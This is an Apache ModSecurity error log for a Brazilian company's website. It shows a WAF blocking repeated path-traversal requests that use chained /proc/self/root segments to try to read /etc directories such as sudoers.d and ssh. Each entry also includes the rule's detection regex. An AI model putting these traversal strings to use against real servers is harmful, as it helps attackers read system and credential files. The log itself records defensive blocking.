[Mon Mar 16 17:12:38.827837 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:37446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkNrysWC90G-1nBrBaKQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:40.136482 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:37456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkOI6lpbStxTqkSkuAogAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:48.545546 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.243.203:55988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkQKQpVkWug9HeOt9L4QAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:49.889892 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:55996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkQf9ocpUE4ed4uDwI9QAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:51.245331 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:42350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkQ46lpbStxTqkSkuAowAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:52.563370 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:42356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkRFajLEzk2WiQ-10o0gAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:53.971794 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:42362] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkRc_BxrYCr4hPDw8AWQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:55.325210 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.243.203:42376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkR6QpVkWug9HeOt9L4gAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:12:56.698672 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:42386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkSLysWC90G-1nBrBaKwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:57.878292 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:42402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkSY6lpbStxTqkSkuApQAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:12:59.196533 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:42412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkS7ysWC90G-1nBrBaLAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:00.586400 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:47504] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkTI6lpbStxTqkSkuApgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:01.808245 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:47512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkTbysWC90G-1nBrBaLQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:08.997294 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:47524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkVLABkC4fWIHEf8ELTQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:10.372460 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:57870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkVqTCbgAP5jq5TehDEQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:11.790110 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:57872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkV9SswJuvopo3lOh1YwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:14.109304 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.243.203:57884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkWaTCbgAP5jq5TehDEgAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:15.527507 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:57888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkW46lpbStxTqkSkuAqgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:13:17.570878 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:57896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkXM_BxrYCr4hPDw8AYgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:18.902196 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:57898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkXqQpVkWug9HeOt9L6AAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:13:19.711501 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:53698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkX9SswJuvopo3lOh1aQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:13:20.247266 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:35790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhkYLABkC4fWIHEf8ELTgAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
